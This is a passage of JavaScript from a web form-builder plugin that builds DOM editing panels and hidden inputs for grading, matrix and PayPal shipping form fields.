	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
    edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr7.appendChild(edit_main_td7);

		
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr7);

	
	edit_div.appendChild(edit_main_table);
	t.appendChild(edit_div);
	
//show table

	element='input';	type='grading'; 
	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_grading");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	var adding_required = document.createElement("input");
            adding_required.setAttribute("type", "hidden");
            adding_required.setAttribute("value", w_required);
            adding_required.setAttribute("name", i+"_requiredform_id_temp");
            adding_required.setAttribute("id", i+"_requiredform_id_temp");
			
 	var adding_total = document.createElement("input");
            adding_total.setAttribute("type", "hidden");
            adding_total.setAttribute("value", w_total);
            adding_total.setAttribute("name", i+"_grading_totalform_id_temp");
            adding_total.setAttribute("id", i+"_grading_totalform_id_temp");
	    
   var div = document.createElement('div');
       	div.setAttribute("id", "main_div");
//tbody sarqac
		
		
	var table = document.createElement('table');
		table.setAttribute("id", i+"_elemet_tableform_id_temp");
	    
	
    var tr = document.createElement('tr');
			
    var td1 = document.createElement('td');
         	td1.setAttribute("valign", 'top');
         	td1.setAttribute("align", 'left');
           	td1.setAttribute("id", i+"_label_sectionform_id_temp");
			
      	var td2 = document.createElement('td');
        	td2.setAttribute("valign", 'top');
         	td2.setAttribute("align", 'left');
           	td2.setAttribute("id", i+"_element_sectionform_id_temp");

      	var br1 = document.createElement('br');
      	var br2 = document.createElement('br');
     	var br3 = document.createElement('br');
      	var br4 = document.createElement('br');

	var div_grading = document.createElement('div');
	    div_grading.setAttribute("id", i+"_elementform_id_temp");

 
      	var label = document.createElement('span');
			label.setAttribute("id", i+"_element_labelform_id_temp");
			label.innerHTML = w_field_label;
			label.setAttribute("class", "label");

	    
      	var required = document.createElement('span');
			required.setAttribute("id", i+"_required_elementform_id_temp");
			required.innerHTML = "";
			required.setAttribute("class", "required");
	if(w_required=="yes")
			required.innerHTML = " *";
	
      	var main_td  = document.getElementById('show_table');
	
      
      	td1.appendChild(label);
      	td1.appendChild(required);
        td2.appendChild(adding_type);
        td2.appendChild(adding_required);
	    td2.appendChild(adding_total);
      
		td2.appendChild(div_grading);
      	tr.appendChild(td1);
      	tr.appendChild(td2);
      	table.appendChild(tr);
      

      	div.appendChild(table);
      	div.appendChild(br3);
      	main_td.appendChild(div);
	
		
	if(w_field_label_pos=="top")
				label_top(i);
				
	
change_class(w_class, i);
refresh_attr(i, 'type_grading');
refresh_grading_items(i);
add_id_and_name(i, 'type_grading');
}

function change_total(value,id){
document.getElementById(id+"_grading_totalform_id_temp").value = value;
document.getElementById(id+"_total_elementform_id_temp").innerHTML = value;
}



function type_matrix(i, w_field_label, w_field_label_pos, w_field_input_type, w_rows, w_columns, w_required, w_class, w_attr_name, w_attr_value) {

	document.getElementById("element_type").value="type_matrix";

	delete_last_child();
// edit table	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		edit_div.setAttribute("style", "border-top:1px dotted black; padding:10px;  padding-top:0px; padding-bottom:0px; margin-top:10px;");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "0");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
      		edit_main_tr1.setAttribute("valing", "top");
		
	var edit_main_tr2  = document.createElement('tr');
      		edit_main_tr2.setAttribute("valing", "top");
		
	var edit_main_tr3  = document.createElement('tr');
      		edit_main_tr3.setAttribute("valing", "top");
		
	var edit_main_tr4  = document.createElement('tr');
      		edit_main_tr4.setAttribute("valing", "top");
		
	var edit_main_tr5  = document.createElement('tr');
      		edit_main_tr5.setAttribute("valing", "top");
			
	var edit_main_tr6  = document.createElement('tr');
      		edit_main_tr6.setAttribute("valing", "top");
	var edit_main_tr7  = document.createElement('tr');
      		edit_main_tr7.setAttribute("valing", "top");

	var edit_main_tr8  = document.createElement('tr');
      		edit_main_tr8.setAttribute("valing", "top");

	

	var edit_main_td1 = document.createElement('td');
		edit_main_td1.style.cssText = "padding-top:10px";	
	var edit_main_td1_1 = document.createElement('td');
		edit_main_td1_1.style.cssText = "padding-top:10px";		
	var edit_main_td2 = document.createElement('td');
		edit_main_td2.style.cssText = "padding-top:10px";
	var edit_main_td2_1 = document.createElement('td');
		edit_main_td2_1.style.cssText = "padding-top:10px";

	var edit_main_td3 = document.createElement('td');
		edit_main_td3.style.cssText = "padding-top:10px";
		
	var edit_main_td3_1 = document.createElement('td');
		edit_main_td3_1.style.cssText = "padding-top:10px ";

		
	var edit_main_td4 = document.createElement('td');
		edit_main_td4.style.cssText = "padding-top:10px" ; 	
		edit_main_td4.setAttribute("id", "rows");
		
	var edit_main_td4_1 = document.createElement('td');
		edit_main_td4_1.style.cssText = "padding-top:10px; vertical-align:top";
     
	var edit_main_td5 = document.createElement('td');
		edit_main_td5.style.cssText = "padding-top:10px";
		edit_main_td5.setAttribute("id", "columns");
	var edit_main_td5_1 = document.createElement('td');
		edit_main_td5_1.style.cssText = "padding-top:10px;  vertical-align:top ";
				
	var edit_main_td6 = document.createElement('td');
		edit_main_td6.style.cssText = "padding-top:10px";
	var edit_main_td6_1 = document.createElement('td');
		edit_main_td6_1.style.cssText = "padding-top:10px";
		
	var edit_main_td7 = document.createElement('td');
		edit_main_td7.style.cssText = "padding-top:10px";
	var edit_main_td7_1 = document.createElement('td');
		edit_main_td7_1.style.cssText = "padding-top:10px";
		  
	var edit_main_td8 = document.createElement('td');
		edit_main_td8.style.cssText = "padding-top:10px";
	
		  
	var el_label_label = document.createElement('label');
			        el_label_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
                el_label_textarea.setAttribute("id", "edit_for_label");
                el_label_textarea.setAttribute("rows", "4");
                el_label_textarea.style.cssText = "width:200px;";
                el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
				el_label_textarea.innerHTML = w_field_label;
		
	var el_label_position_label = document.createElement('label');
			        el_label_position_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_position_label.innerHTML = "Field label position";
	
	var el_label_position1 = document.createElement('input');
                el_label_position1.setAttribute("id", "edit_for_label_position_top");
                el_label_position1.setAttribute("type", "radio");
                el_label_position1.setAttribute("value", "left");
                
                el_label_position1.setAttribute("name", "edit_for_label_position");
                el_label_position1.setAttribute("onchange", "label_left("+i+")");
		Left = document.createTextNode("Left");
		
	var el_label_position2 = document.createElement('input');
                el_label_position2.setAttribute("id", "edit_for_label_position_left");
                el_label_position2.setAttribute("type", "radio");
                el_label_position2.setAttribute("value", "top");
			
                el_label_position2.setAttribute("name", "edit_for_label_position");
                el_label_position2.setAttribute("onchange", "label_top("+i+")");
		Top = document.createTextNode("Top");
		
	if(w_field_label_pos=="top")
	
				el_label_position2.setAttribute("checked", "checked");
	else
				el_label_position1.setAttribute("checked", "checked");
				
	


var el_input_type_label = document.createElement('label');
	        el_input_type_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_input_type_label.innerHTML = "Input Type";
	
	var el_input_type = document.createElement('select');
                el_input_type.setAttribute("id", "edit_for_select_input_type");
                el_input_type.setAttribute("name", "edit_for_select_input_type");
               el_input_type.setAttribute("onchange", "change_input_type("+i+",this.value); refresh_matrix("+i+")");
                
	var el_input_type1 = document.createElement('option');
                el_input_type1.setAttribute("id", "edit_for_input_type_radio");
                el_input_type1.setAttribute("value", "radio");
Radio_Button = document.createTextNode("Radio Button");

    var el_input_type2 = document.createElement('option');
                el_input_type2.setAttribute("id", "edit_for_input_type_checkbox");
                el_input_type2.setAttribute("value", "checkbox");
Check_Box = document.createTextNode("Check Box");

    var el_input_type3 = document.createElement('option');
                el_input_type3.setAttribute("id", "edit_for_input_type_text");
                el_input_type3.setAttribute("value", "text");
Text_Box= document.createTextNode("Text Box");

    var el_input_type4 = document.createElement('option');
                el_input_type4.setAttribute("id", "edit_for_input_type_select");
                el_input_type4.setAttribute("value", "select");				
Drop_Down = document.createTextNode("Drop Down");              
	
	
	

		if(w_field_input_type=="radio")
				el_input_type1.setAttribute("selected", "selected");
	else
	{
	if(w_field_input_type=="checkbox")
				el_input_type2.setAttribute("selected", "selected");
				else{
				   if(w_field_input_type=="text")
				    el_input_type3.setAttribute("selected", "selected");
				else{
				if(w_field_input_type=="select")
				    el_input_type4.setAttribute("selected", "selected");
				
				}
				}
}


		
	var el_style_label = document.createElement('label');
	        el_style_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
                el_style_textarea.setAttribute("id", "element_style");
		el_style_textarea.setAttribute("type", "text");
 		el_style_textarea.setAttribute("value", w_class);
                el_style_textarea.style.cssText = "width:200px;";
                el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");
				
				

	var el_required_label = document.createElement('label');
	        el_required_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
                el_required.setAttribute("id", "el_send");
                el_required.setAttribute("type", "checkbox");
                el_required.setAttribute("value", "yes");
                el_required.setAttribute("onclick", "set_required('"+i+"_required')");
	if(w_required=="yes")
			
                el_required.setAttribute("checked", "checked");
		

		
	
	var el_attr_label = document.createElement('label');
	                el_attr_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');
                el_attr_add.setAttribute("id", "el_choices_add");
           	el_attr_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_matrix')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_matrix')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");	
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_matrix')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_matrix')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}

	var el_rows_label = document.createElement('label');
			        el_rows_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_rows_label.innerHTML = "Rows ";
	var el_rows_add = document.createElement('img');
                el_rows_add.setAttribute("id", "el_rows_add");
           		el_rows_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_rows_add.style.cssText = 'cursor:pointer;';
            	el_rows_add.setAttribute("title", 'add');
                el_rows_add.setAttribute("onClick", "add_to_matrix('rows',  "+i+")");
				
	var el_columns_label = document.createElement('label');
			        el_columns_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_columns_label.innerHTML = "Columns ";
	var el_columns_add = document.createElement('img');
                el_columns_add.setAttribute("id", "el_columns_add");
           		el_columns_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_columns_add.style.cssText = 'cursor:pointer;';
            	el_columns_add.setAttribute("title", 'add');
                el_columns_add.setAttribute("onClick", "add_to_matrix('columns',  "+i+")");			
	
	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(Left);
	edit_main_td2_1.appendChild(br2);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(Top);


	
    edit_main_td3.appendChild(el_input_type_label);
	
	el_input_type1.appendChild(Radio_Button);
	el_input_type2.appendChild(Check_Box);
	el_input_type3.appendChild(Text_Box);
	el_input_type4.appendChild(Drop_Down);
	
	el_input_type.appendChild(el_input_type1);
	el_input_type.appendChild(el_input_type2);
	el_input_type.appendChild(el_input_type3);
	el_input_type.appendChild(el_input_type4);
	
	edit_main_td3_1.appendChild(el_input_type);
	
	
	edit_main_td4.appendChild(el_rows_label);
	edit_main_td4_1.appendChild(el_rows_add);
	
	edit_main_td5.appendChild(el_columns_label);
	edit_main_td5_1.appendChild(el_columns_add);
	
	edit_main_td6.appendChild(el_required_label);
	edit_main_td6_1.appendChild(el_required);
	

	edit_main_td7.appendChild(el_style_label);
	edit_main_td7_1.appendChild(el_style_textarea);
	
	edit_main_td8.appendChild(el_attr_label);
	edit_main_td8.appendChild(el_attr_add);
	edit_main_td8.appendChild(br6);
	edit_main_td8.appendChild(el_attr_table);
	edit_main_td8.setAttribute("colspan", "2");
	

	
	n=w_rows.length;
	for(k=1; k<n; k++)
	{	
		var br = document.createElement('br');
			br.setAttribute("id", "brrows"+k);
			
		var el_rows = document.createElement('input');
			el_rows.setAttribute("id", "el_rows"+k);
			el_rows.setAttribute("type", "text");
			el_rows.setAttribute("value", w_rows[k]);
			el_rows.style.cssText =   "width:100px; margin:0; padding:0; border-width: 1px";
			el_rows.setAttribute("onKeyUp", "change_label('"+i+"_label_elementform_id_temp"+k+"_0', this.value); change_in_value('"+i+"_label_elementform_id_temp"+k+"_0', this.value)");
	
		var el_rows_remove = document.createElement('img');
			el_rows_remove.setAttribute("id", "el_rows"+k+"_remove");
			el_rows_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');		
			el_rows_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_rows_remove.setAttribute("align", 'top');
			el_rows_remove.setAttribute("onClick", "remove_rowcols("+k+","+i+",'rows')");
			
		edit_main_td4.appendChild(br);
		edit_main_td4.appendChild(el_rows);
		edit_main_td4.appendChild(el_rows_remove);
	
	}
	
	
	m=w_columns.length;
	for(k=1; k<m; k++)
	{	
		var br = document.createElement('br');
			br.setAttribute("id", "brcolumns"+k);
			
		var el_columns = document.createElement('input');
			el_columns.setAttribute("id", "el_columns"+k);
			el_columns.setAttribute("type", "text");
			el_columns.setAttribute("value", w_columns[k]);
			el_columns.style.cssText ="width:100px; margin:0; padding:0; border-width: 1px";
			el_columns.setAttribute("onKeyUp", "change_label('"+i+"_label_elementform_id_temp0_"+k+"', this.value); change_in_value('"+i+"_label_elementform_id_temp0_"+k+"', this.value)");
	
		var el_columns_remove = document.createElement('img');
			el_columns_remove.setAttribute("id", "el_columns"+k+"_remove");
			el_columns_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');		
			el_columns_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_columns_remove.setAttribute("align", 'top');
			el_columns_remove.setAttribute("onClick", "remove_rowcols("+k+","+i+",'columns')");
			
		edit_main_td5.appendChild(br);
		edit_main_td5.appendChild(el_columns);
		edit_main_td5.appendChild(el_columns_remove);
	
	}

	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
    edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);	
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr7.appendChild(edit_main_td7_1);
	edit_main_tr8.appendChild(edit_main_td8);
	
	
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr7);
	edit_main_table.appendChild(edit_main_tr8);
	
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	
//show table

	element='input';	type='matrix'; 
	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_matrix");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	var adding_required = document.createElement("input");
            adding_required.setAttribute("type", "hidden");
            adding_required.setAttribute("value", w_required);
            adding_required.setAttribute("name", i+"_requiredform_id_temp");
            adding_required.setAttribute("id", i+"_requiredform_id_temp");
			
 	var adding_input_type = document.createElement("input");
            adding_input_type.setAttribute("type", "hidden");
            adding_input_type.setAttribute("value", w_field_input_type);
            adding_input_type.setAttribute("name", i+"_input_typeform_id_temp");
            adding_input_type.setAttribute("id", i+"_input_typeform_id_temp");
	    
   var div = document.createElement('div');
       	div.setAttribute("id", "main_div");
//tbody sarqac
		
		
	var table = document.createElement('table');
		table.setAttribute("id", i+"_elemet_tableform_id_temp");
	    
	
    var tr = document.createElement('tr');
			
    var td1 = document.createElement('td');
         	td1.setAttribute("valign", 'top');
         	td1.setAttribute("align", 'left');
           	td1.setAttribute("id", i+"_label_sectionform_id_temp");
			
      	var td2 = document.createElement('td');
        	td2.setAttribute("valign", 'top');
         	td2.setAttribute("align", 'left');
           	td2.setAttribute("id", i+"_element_sectionform_id_temp");

      	var br1 = document.createElement('br');
      	var br2 = document.createElement('br');
     	var br3 = document.createElement('br');
      	var br4 = document.createElement('br');
	//	table_little -@ sarqaca tbody table_little darela table_little_t
	var table_little_t = document.createElement('table');
	    table_little_t.setAttribute("id", i+"_elementform_id_temp");
	 	//table_little_t.setAttribute("border", "1");

	
		
	var table_little = document.createElement('tbody');
           	table_little.setAttribute("id", i+"_table_little");
	
	
	table_little_t.appendChild(table_little);
	

	    
      	var label = document.createElement('span');
			label.setAttribute("id", i+"_element_labelform_id_temp");
			label.innerHTML = w_field_label;
			label.setAttribute("class", "label");

	    
      	var required = document.createElement('span');
			required.setAttribute("id", i+"_required_elementform_id_temp");
			required.innerHTML = "";
			required.setAttribute("class", "required");
	if(w_required=="yes")
			required.innerHTML = " *";
	
      	var main_td  = document.getElementById('show_table');
	
      
      	td1.appendChild(label);
      	td1.appendChild(required);
        td2.appendChild(adding_type);
  
        td2.appendChild(adding_required);
	    td2.appendChild(adding_input_type);
      
		td2.appendChild(table_little_t);
      	tr.appendChild(td1);
      	tr.appendChild(td2);
      	table.appendChild(tr);
      

      	div.appendChild(table);
      	div.appendChild(br3);
      	main_td.appendChild(div);
	
		
	if(w_field_label_pos=="top")
				label_top(i);
				
	
change_class(w_class, i);
refresh_attr(i, 'type_matrix');
refresh_matrix(i);
}

function change_input_type(id, value){
	document.getElementById(id+"_input_typeform_id_temp").value = value;
}

function type_paypal_shipping(i, w_field_label, w_field_label_pos, w_flow, w_choices, w_choices_price, w_choices_checked, w_required, w_randomize, w_allow_other, w_allow_other_num, w_class, w_attr_name, w_attr_value,  w_property, w_property_type, w_property_values ){

	document.getElementById("element_type").value="type_paypal_shipping";

	delete_last_child();
// edit table	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		edit_div.setAttribute("style", "border-top:1px dotted black;padding:10px; padding:10px; padding-top:0px; padding-bottom:0px; margin-top:10px;");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "0");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
      		edit_main_tr1.setAttribute("valing", "top");
		
	var edit_main_tr2  = document.createElement('tr');
      		edit_main_tr2.setAttribute("valing", "top");
		
	var edit_main_tr3  = document.createElement('tr');
      		edit_main_tr3.setAttribute("valing", "top");
		
	var edit_main_tr4  = document.createElement('tr');
      		edit_main_tr4.setAttribute("valing", "top");
		
	var edit_main_tr5  = document.createElement('tr');
      		edit_main_tr5.setAttribute("valing", "top");
			
	var edit_main_tr6  = document.createElement('tr');
      		edit_main_tr6.setAttribute("valing", "top");
			
	var edit_main_tr7  = document.createElement('tr');
      		edit_main_tr7.setAttribute("valing", "top");
			
	var edit_main_tr8  = document.createElement('tr');
      		edit_main_tr8.setAttribute("valing", "top");

	var edit_main_tr9  = document.createElement('tr');
      		edit_main_tr9.setAttribute("valing", "top");

	var edit_main_tr10  = document.createElement('tr');
      		edit_main_tr10.setAttribute("valing", "top");

	var edit_main_td1 = document.createElement('td');
		edit_main_td1.style.cssText = "padding-top:10px";	
	var edit_main_td1_1 = document.createElement('td');
		edit_main_td1_1.style.cssText = "padding-top:10px";		
	var edit_main_td2 = document.createElement('td');
		edit_main_td2.style.cssText = "padding-top:10px";
	var edit_main_td2_1 = document.createElement('td');
		edit_main_td2_1.style.cssText = "padding-top:10px";

	var edit_main_td3 = document.createElement('td');
		edit_main_td3.style.cssText = "padding-top:10px";
	var edit_main_td3_1 = document.createElement('td');
		edit_main_td3_1.style.cssText = "padding-top:10px";

	var edit_main_td4 = document.createElement('td');
		edit_main_td4.style.cssText = "padding-top:10px";
	var edit_main_td4_1 = document.createElement('td');
		edit_main_td4_1.style.cssText = "padding-top:10px";
		
		edit_main_td4.setAttribute("id", "choices");
		
		
	var edit_main_td10 = document.createElement('td');
		edit_main_td10.style.cssText = "padding-top:10px";
	var edit_main_td10_1 = document.createElement('td');
		edit_main_td10_1.style.cssText = "padding-top:10px";

	var edit_main_td5 = document.createElement('td');
		edit_main_td5.style.cssText = "padding-top:10px";
	var edit_main_td5_1 = document.createElement('td');
		edit_main_td5_1.style.cssText = "padding-top:10px";
				
	var edit_main_td6 = document.createElement('td');
		edit_main_td6.style.cssText = "padding-top:10px";
	var edit_main_td6_1 = document.createElement('td');
		edit_main_td6_1.style.cssText = "padding-top:10px";
		
	var edit_main_td7 = document.createElement('td');
		edit_main_td7.style.cssText = "padding-top:10px";
	var edit_main_td7_1 = document.createElement('td');
		edit_main_td7_1.style.cssText = "padding-top:10px";
		  
	var edit_main_td8 = document.createElement('td');
		edit_main_td8.style.cssText = "padding-top:10px";
	var edit_main_td8_1 = document.createElement('td');
		edit_main_td8_1.style.cssText = "padding-top:10px";
		  
	var edit_main_td9 = document.createElement('td');
		edit_main_td9.style.cssText = "padding-top:10px";
	var edit_main_td9_1 = document.createElement('td');
		edit_main_td9_1.style.cssText = "padding-top:10px";
		  
	var el_label_label = document.createElement('label');
			        el_label_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
                el_label_textarea.setAttribute("id", "edit_for_label");
                el_label_textarea.setAttribute("rows", "4");
                el_label_textarea.style.cssText = "width:200px;";
                el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
				el_label_textarea.innerHTML = w_field_label;
		
	var el_label_position_label = document.createElement('label');
			        el_label_position_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_position_label.innerHTML = "Field label position";
	
	var el_label_position1 = document.createElement('input');
                el_label_position1.setAttribute("id", "edit_for_label_position_top");
                el_label_position1.setAttribute("type", "radio");
                el_label_position1.setAttribute("value", "left");
                

                el_label_position1.setAttribute("name", "edit_for_label_position");
                el_label_position1.setAttribute("onchange", "label_left("+i+")");
				el_label_position1.setAttribute("checked", "checked");
		Left = document.createTextNode("Left");
		
	var el_label_position2 = document.createElement('input');
                el_label_position2.setAttribute("id", "edit_for_label_position_left");
                el_label_position2.setAttribute("type", "radio");

                el_label_position2.setAttribute("value", "top");
	

                el_label_position2.setAttribute("name", "edit_for_label_position");
                el_label_position2.setAttribute("onchange", "label_top("+i+")");
		Top = document.createTextNode("Top");
		
	if(w_field_label_pos=="top")
	
				el_label_position2.setAttribute("checked", "checked");
	else
				el_label_position1.setAttribute("checked", "checked");
	
	var el_label_flow = document.createElement('label');
			        el_label_flow.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_flow.innerHTML = "Relative Position";

	var el_flow_vertical = document.createElement('input');
                el_flow_vertical.setAttribute("id", "edit_for_flow_vertical");
                el_flow_vertical.setAttribute("type", "radio");
                el_flow_vertical.setAttribute("value", "ver");
                el_flow_vertical.setAttribute("name", "edit_for_flow");
                el_flow_vertical.setAttribute("onchange", "flow_ver("+i+")");
		Vertical = document.createTextNode("Vertical");
		
	var el_flow_horizontal = document.createElement('input');
            el_flow_horizontal.setAttribute("id", "edit_for_flow_horizontal");
            el_flow_horizontal.setAttribute("type", "radio");
            el_flow_horizontal.setAttribute("value", "hor");
            el_flow_horizontal.setAttribute("name", "edit_for_flow");
            el_flow_horizontal.setAttribute("onchange", "flow_hor("+i+")");
		Horizontal = document.createTextNode("Horizontal");
		
	if(w_flow=="hor")
				el_flow_horizontal.setAttribute("checked", "checked");
	else
				el_flow_vertical.setAttribute("checked", "checked");
				
	var el_style_label = document.createElement('label');
	    el_style_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
        el_style_textarea.setAttribute("id", "element_style");
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("value", w_class);
        el_style_textarea.style.cssText = "width:200px;";
        el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");
	
	var el_required_label = document.createElement('label');
	        el_required_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
                el_required.setAttribute("id", "el_send");
                el_required.setAttribute("type", "checkbox");
                el_required.setAttribute("value", "yes");
                el_required.setAttribute("onclick", "set_required('"+i+"_required')");
	if(w_required=="yes")
			
                el_required.setAttribute("checked", "checked");

				
	var el_randomize_label = document.createElement('label');
				el_randomize_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
				el_randomize_label.innerHTML = "Randomize in frontend";
	
	var el_randomize = document.createElement('input');
                el_randomize.setAttribute("id", "el_randomize");
                el_randomize.setAttribute("type", "checkbox");
                el_randomize.setAttribute("value", "yes");
